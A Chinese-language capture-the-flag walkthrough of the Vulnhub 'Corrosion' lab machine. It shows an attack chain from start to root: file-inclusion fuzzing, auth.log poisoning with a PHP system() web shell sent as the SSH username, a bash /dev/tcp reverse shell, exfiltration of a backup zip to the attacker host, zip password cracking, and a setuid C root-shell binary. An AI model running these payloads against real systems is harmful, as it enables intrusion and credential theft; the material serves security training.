Vulnhub Corrosion靶机详细解题过程
Corrosion
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.89.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:c4:83:a7 1 60 PCS Systemtechnik GmbH
192.168.56.180 08:00:27:21:e8:08 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.180
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.180 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-16 04:22 EST
Nmap scan report for bogon (192.168.56.180)
Host is up (0.000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0c:a7:1c:8b:4e:85:6b:16:8c:fd:b7:cd:5f:60:3e:a4 (RSA)
| 256 0f:24:f4:65:af:50:d3:d3:aa:09:33:c3:17:3d:63:c7 (ECDSA)
|_ 256 b0:fa:cd:77:73:da:e4:7d:c8:75:a1:c5:5f:2c:21:0a (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:21:E8:08 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.40 seconds
目标主机有2个开放端口22(SSH服务)、80(HTTP服务)
Get Access
访问80端口,返回apache默认页面。
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ curl http://192.168.56.180/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.46 (Ubuntu) Server at 192.168.56.180 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ curl http://192.168.56.180/tasks/tasks_todo.txt
# Tasks that need to be completed
1. Change permissions for auth log
2. Change port 22 -> 7672
3. Set up phpMyAdmin
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ curl http://192.168.56.180/blog-post/
<!DOCTYPE html>
<html>
<body>
<h1>Welcome to my Blog!</h1>
<p>This website is in development. Will be updated in the next couple Months! - randy</p>
<img src="image.jpg">
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ wget http://192.168.56.180/blog-post/image.jpg
--2022-11-16 04:29:00-- http://192.168.56.180/blog-post/image.jpg
Connecting to 192.168.56.180:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 429872 (420K) [image/jpeg]
Saving to: ‘image.jpg’
image.jpg 100%[===============================================================================================================================>] 419.80K --.-KB/s in 0.001s
2022-11-16 04:29:00 (275 MB/s) - ‘image.jpg’ saved [429872/429872]
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ ls
image.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ steghide extract -sf image.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ stegseek image.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.18% (132.3 MB)
[!] error: Could not find a valid passphras
在/blog-post下继续扫描目录和文件
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ gobuster dir -u http://192.168.56.180/blog-post/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.180/blog-post/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/16 04:30:16 Starting gobuster in directory enumeration mode
===============================================================
/archives (Status: 301) [Size: 329] [--> http://192.168.56.180/blog-post/archives/]
/uploads (Status: 301) [Size: 328] [--> http://192.168.56.180/blog-post/uploads/]
Progress: 213842 / 220561 (96.95%)===============================================================
2022/11/16 04:30:28 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ curl http://192.168.56.180/blog-post/archives/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /blog-post/archives</title>
</head>
<body>
<h1>Index of /blog-post/archives</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/blog-post/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="randylogs.php">randylogs.php</a></td><td align="right">2021-07-29 17:20 </td><td align="right">140 </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.46 (Ubuntu) Server at 192.168.56.180 Port 80</address>
</body></html>
访问/blog-post/archives/randylogs.php,没有返回结果,用WFUZZ FUZZ一下有什么参数
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ wfuzz -c -u http://192.168.56.180/blog-post/archives/randylogs.php?FUZZ=../../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.180/blog-post/archives/randylogs.php?FUZZ=../../../../../../etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000759: 200 48 L 85 W 2832 Ch "file"
FUZZ出来参数名称为File,手动确认一下
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ curl http://192.168.56.180/blog-post/archives/randylogs.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:118:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi:x:113:120:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:114:121:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:115:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
nm-openvpn:x:117:122:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
whoopsie:x:118:123::/nonexistent:/bin/false
sssd:x:119:124:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
saned:x:120:126::/var/lib/saned:/usr/sbin/nologin
colord:x:121:127:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
hplip:x:124:7:HPLIP system user,,,:/run/hplip:/bin/false
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
randy:x:1000:1000:randy,,,:/home/randy:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:127:65534::/run/sshd:/usr/sbin/nologin
/tasks文件中提示auth_log
http://192.168.56.180/blog-post/archives/randylogs.php?file=/var/log/auth.log
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ curl http://192.168.56.180/blog-post/archives/randylogs.php?file=/var/log/auth.log
Nov 16 10:19:19 corrosion gdm-launch-environment]: pam_unix(gdm-launch-environment:session): session opened for user gdm by (uid=0)
Nov 16 10:19:19 corrosion systemd-logind[683]: New session c1 of user gdm.
Nov 16 10:19:19 corrosion systemd: pam_unix(systemd-user:session): session opened for user gdm by (uid=0)
Nov 16 10:19:22 corrosion polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.43 [/usr/bin/gnome-shell], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_US.UTF-8)
Nov 16 10:19:45 corrosion dbus-daemon[647]: [system] Failed to activate service 'org.bluez': timed out (service_start_timeout=25000ms)
Nov 16 10:20:01 corrosion CRON[1405]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:20:01 corrosion CRON[1405]: pam_unix(cron:session): session closed for user root
Nov 16 10:21:01 corrosion CRON[1413]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:21:01 corrosion CRON[1413]: pam_unix(cron:session): session closed for user root
Nov 16 10:22:01 corrosion CRON[1417]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:22:01 corrosion CRON[1417]: pam_unix(cron:session): session closed for user root
Nov 16 10:22:23 corrosion sshd[1420]: error: kex_exchange_identification: Connection closed by remote host
Nov 16 10:22:23 corrosion sshd[1420]: Connection closed by 192.168.56.137 port 60174
Nov 16 10:22:29 corrosion sshd[1421]: error: Protocol major versions differ: 2 vs. 1
Nov 16 10:22:29 corrosion sshd[1422]: error: Protocol major versions differ: 2 vs. 1
Nov 16 10:22:29 corrosion sshd[1422]: banner exchange: Connection from 192.168.56.137 port 41008: could not read protocol version
Nov 16 10:22:29 corrosion sshd[1421]: banner exchange: Connection from 192.168.56.137 port 40998: could not read protocol version
Nov 16 10:22:29 corrosion sshd[1423]: Unable to negotiate with 192.168.56.137 port 41016: no matching host key type found. Their offer: ssh-dss [preauth]
Nov 16 10:22:29 corrosion sshd[1425]: Connection closed by 192.168.56.137 port 41032 [preauth]
Nov 16 10:22:29 corrosion sshd[1427]: Connection closed by 192.168.56.137 port 41036 [preauth]
Nov 16 10:22:29 corrosion sshd[1430]: Unable to negotiate with 192.168.56.137 port 41052: no matching host key type found. Their offer: ecdsa-sha2-nistp384 [preauth]
Nov 16 10:22:29 corrosion sshd[1432]: Unable to negotiate with 192.168.56.137 port 41054: no matching host key type found. Their offer: ecdsa-sha2-nistp521 [preauth]
Nov 16 10:22:29 corrosion sshd[1434]: Connection closed by 192.168.56.137 port 41068 [preauth]
Nov 16 10:23:01 corrosion CRON[1436]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:23:01 corrosion CRON[1436]: pam_unix(cron:session): session closed for user root
Nov 16 10:24:01 corrosion CRON[1441]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:24:01 corrosion CRON[1441]: pam_unix(cron:session): session closed for user root
Nov 16 10:25:01 corrosion CRON[1556]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:25:01 corrosion CRON[1556]: pam_unix(cron:session): session closed for user root
Nov 16 10:26:01 corrosion CRON[1575]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:26:01 corrosion CRON[1575]: pam_unix(cron:session): session closed for user root
Nov 16 10:27:01 corrosion CRON[1578]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:27:01 corrosion CRON[1578]: pam_unix(cron:session): session closed for user root
Nov 16 10:28:01 corrosion CRON[1582]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:28:01 corrosion CRON[1582]: pam_unix(cron:session): session closed for user root
Nov 16 10:29:01 corrosion CRON[1585]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:29:01 corrosion CRON[1585]: pam_unix(cron:session): session closed for user root
Nov 16 10:30:01 corrosion CRON[1602]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:30:01 corrosion CRON[1601]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:30:01 corrosion CRON[1601]: pam_unix(cron:session): session closed for user root
Nov 16 10:30:01 corrosion CRON[1602]: pam_unix(cron:session): session closed for user root
Nov 16 10:31:01 corrosion CRON[1614]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:31:01 corrosion CRON[1614]: pam_unix(cron:session): session closed for user root
Nov 16 10:32:01 corrosion CRON[1624]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:32:01 corrosion CRON[1624]: pam_unix(cron:session): session closed for user root
Nov 16 10:33:01 corrosion CRON[1629]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:33:01 corrosion CRON[1629]: pam_unix(cron:session): session closed for user root
Nov 16 10:34:01 corrosion CRON[1632]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:34:01 corrosion CRON[1632]: pam_unix(cron:session): session closed for user root
Nov 16 10:35:01 corrosion CRON[1658]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:35:01 corrosion CRON[1658]: pam_unix(cron:session): session closed for user root
Nov 16 10:36:01 corrosion CRON[1661]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:36:01 corrosion CRON[1661]: pam_unix(cron:session): session closed for user root
Nov 16 10:37:01 corrosion CRON[1664]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:37:01 corrosion CRON[1664]: pam_unix(cron:session): session closed for user root
Nov 16 10:38:01 corrosion CRON[1668]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:38:01 corrosion CRON[1668]: pam_unix(cron:session): session closed for user root
Nov 16 10:39:01 corrosion CRON[1673]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:39:01 corrosion CRON[1672]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:39:01 corrosion CRON[1672]: pam_unix(cron:session): session closed for user root
Nov 16 10:39:01 corrosion CRON[1673]: pam_unix(cron:session): session closed for user root
Nov 16 10:40:01 corrosion CRON[1754]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:40:01 corrosion CRON[1754]: pam_unix(cron:session): session closed for user root
Nov 16 10:41:01 corrosion CRON[1757]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:41:01 corrosion CRON[1757]: pam_unix(cron:session): session closed for user root
Nov 16 10:42:01 corrosion CRON[1760]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:42:01 corrosion CRON[1760]: pam_unix(cron:session): session closed for user root
现在需要设法将一句话php写进该日志,可用ssh登录
然后再次访问auth log文件,并带上cmd参数
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ ssh '<?php system($_GET["beijing"]); ?>'@192.168.56.180
然后访问auth log文件,并带上参数beijing
http://192.168.56.180/blog-post/archives/randylogs.php?file=/var/log/auth.log&beijing=uname%20-a
有成功返回结果,接下来设法获得shell
bash -c 'bash -i >& /dev/tcp/192.168.56.137/5555 0>&1'
对这个进行url编码
bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.137%2F5555%200%3E%261'
Kali Linux成功拿到了shell
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.180] 54228
bash: cannot set terminal process group (899): Inappropriate ioctl for device
bash: no job control in this shell
www-data@corrosion:/var/www/html/blog-post/archives$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@corrosion:/var/www/html/blog-post/archives$
为了下载backups目录下的文件,另外spawn一个shell
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ sudo nc -nlvp 6666 >user.zip
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.180] 45542
在靶机执行:
www-data@corrosion:/var$ cd backups
cd backups
www-data@corrosion:/var/backups$ ls
ls
alternatives.tar.0
alternatives.tar.1.gz
apt.extended_states.0
dpkg.arch.0
dpkg.arch.1.gz
dpkg.arch.2.gz
dpkg.diversions.0
dpkg.diversions.1.gz
dpkg.diversions.2.gz
dpkg.statoverride.0
dpkg.statoverride.1.gz
dpkg.statoverride.2.gz
dpkg.status.0
dpkg.status.1.gz
dpkg.status.2.gz
user_backup.zip
www-data@corrosion:/var/backups$ cat user_backup.zip > /dev/tcp/192.168.56.137/6666
< cat user_backup.zip > /dev/tcp/192.168.56.137/6666
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ unzip user.zip
Archive: user.zip
[user.zip] id_rsa password:
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ zip2john user.zip > hashes
ver 2.0 efh 5455 efh 7875 user.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1979, decmplen=2590, crc=A144E09A ts=0298 cs=0298 type=8
ver 2.0 efh 5455 efh 7875 user.zip/id_rsa.pub PKZIP Encr: TS_chk, cmplen=470, decmplen=563, crc=41C30277 ts=029A cs=029a type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** user.zip/my_password.txt PKZIP Encr: TS_chk, cmplen=35, decmplen=23, crc=21E9B663 ts=02BA cs=02ba type=0
ver 2.0 efh 5455 efh 7875 user.zip/easysysinfo.c PKZIP Encr: TS_chk, cmplen=115, decmplen=148, crc=A256BBD9 ts=0170 cs=0170 type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ ls
hashes image.jpg log nmap_full_scan user.zip
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!randybaby (user.zip)
1g 0:00:00:01 DONE (2022-11-16 05:23) 0.9174g/s 13156Kp/s 13156Kc/s 13156KC/s "2parrow"..!LUVP3DRO
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
这就得到用户randy的私钥和密码,用这个登录ssh
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ cat my_password.txt
randylovesgoldfish1998
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ ssh randy@192.168.56.180
randy@192.168.56.180's password:
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-25-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
119 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Fri Jul 30 15:28:02 2021 from 10.0.0.69
randy@corrosion:~$ id
uid=1000(randy) gid=1000(randy) groups=1000(randy),4(adm),24(cdrom),30(dip),46(plugdev),121(lpadmin),133(sambashare)
randy@corrosion:~$
randy@corrosion:~$ sudo -l
[sudo] password for randy:
Sorry, try again.
[sudo] password for randy:
Sorry, try again.
[sudo] password for randy:
Matching Defaults entries for randy on corrosion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User randy may run the following commands on corrosion:
(root) PASSWD: /home/randy/tools/
andy@corrosion:~/tools$ ls
custombinary.c easysysinfo easysysinfo.py
randy@corrosion:~/tools$ ls -alh
total 32K
drwxrwxr-x 2 randy randy 4.0K Nov 16 11:29 .
drwxr-x--- 17 randy randy 4.0K Jul 30 2021 ..
-rw-rw-r-- 1 randy randy 104 Nov 16 11:29 custombinary.c
-rwxrwxr-x 1 randy randy 16K Nov 16 11:29 easysysinfo
-rwxr-xr-x 1 root root 318 Jul 29 2021 easysysinfo.py
randy@corrosion:~/tools$ file easysysinfo
easysysinfo: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6e5c9acf0c78eb358c90c51a3be4cf3563ef744d, for GNU/Linux 3.2.0, not stripped
虽然可以利用easysysinfo提权,但是该文件为二进制文件,没办法修改,也不知道这个程序功能是什么,另外编写一个提权程序替换easysysinfo
easysysinfo
randy@corrosion:~$ cd /home/randy/tools
randy@corrosion:~/tools$ ls -alh
total 28K
drwxrwxr-x 2 randy randy 4.0K Jul 30 2021 .
drwxr-x--- 17 randy randy 4.0K Jul 30 2021 ..
-rwsr-xr-x 1 root root 16K Jul 30 2021 easysysinfo
-rwxr-xr-x 1 root root 318 Jul 29 2021 easysysinfo.py
randy@corrosion:~/tools$ nano custombinary.c
randy@corrosion:~/tools$ cat custombinary.c
#include <unistd.h>
#include <stdlib.h>
void main()
{
setuid(0);
setgid(0);
system("bash -i");
}
randy@corrosion:~/tools$ gcc custombinary.c -o easysysinfo
randy@corrosion:~/tools$ ls
custombinary.c easysysinfo easysysinfo.py
randy@corrosion:~/tools$ sudo /home/randy/tools/easysysinfo
root@corrosion:/home/randy/tools# cd /root
root@corrosion:~# ls -alh
total 52K
drwx------ 7 root root 4.0K Jul 30 2021 .
drwxr-xr-x 20 root root 4.0K Jul 29 2021 ..
-rw-r--r-- 1 root root 461 Jul 30 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Aug 14 2019 .bashrc
drwx------ 2 root root 4.0K Apr 20 2021 .cache
drwx------ 3 root root 4.0K Jul 30 2021 .config
drwxr-xr-x 2 root root 4.0K Jul 30 2021 creds
drwxr-xr-x 3 root root 4.0K Jul 29 2021 .local
-rw-r--r-- 1 root root 10 Nov 16 11:30 logs.txt
-rw-r--r-- 1 root root 161 Sep 16 2020 .profile
-rw-r--r-- 1 root root 251 Jul 30 2021 root.txt
-rw-r--r-- 1 root root 66 Jul 30 2021 .selected_editor
drwxr-xr-x 3 root root 4.0K Jul 29 2021 snap
-rw-r--r-- 1 root root 0 Jul 30 2021 .sudo_as_admin_successful
root@corrosion:~# cat root.txt
FLAG: 4NJSA99SD7922197D7S90PLAWE
Congrats! Hope you enjoyed my first machine posted on VulnHub!
Ping me on twitter @proxyprgrammer for any suggestions.
Youtube: https://www.youtube.com/c/ProxyProgrammer
Twitter: https://twitter.com/proxyprgrammer
root@corrosion:~#
提权成功!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
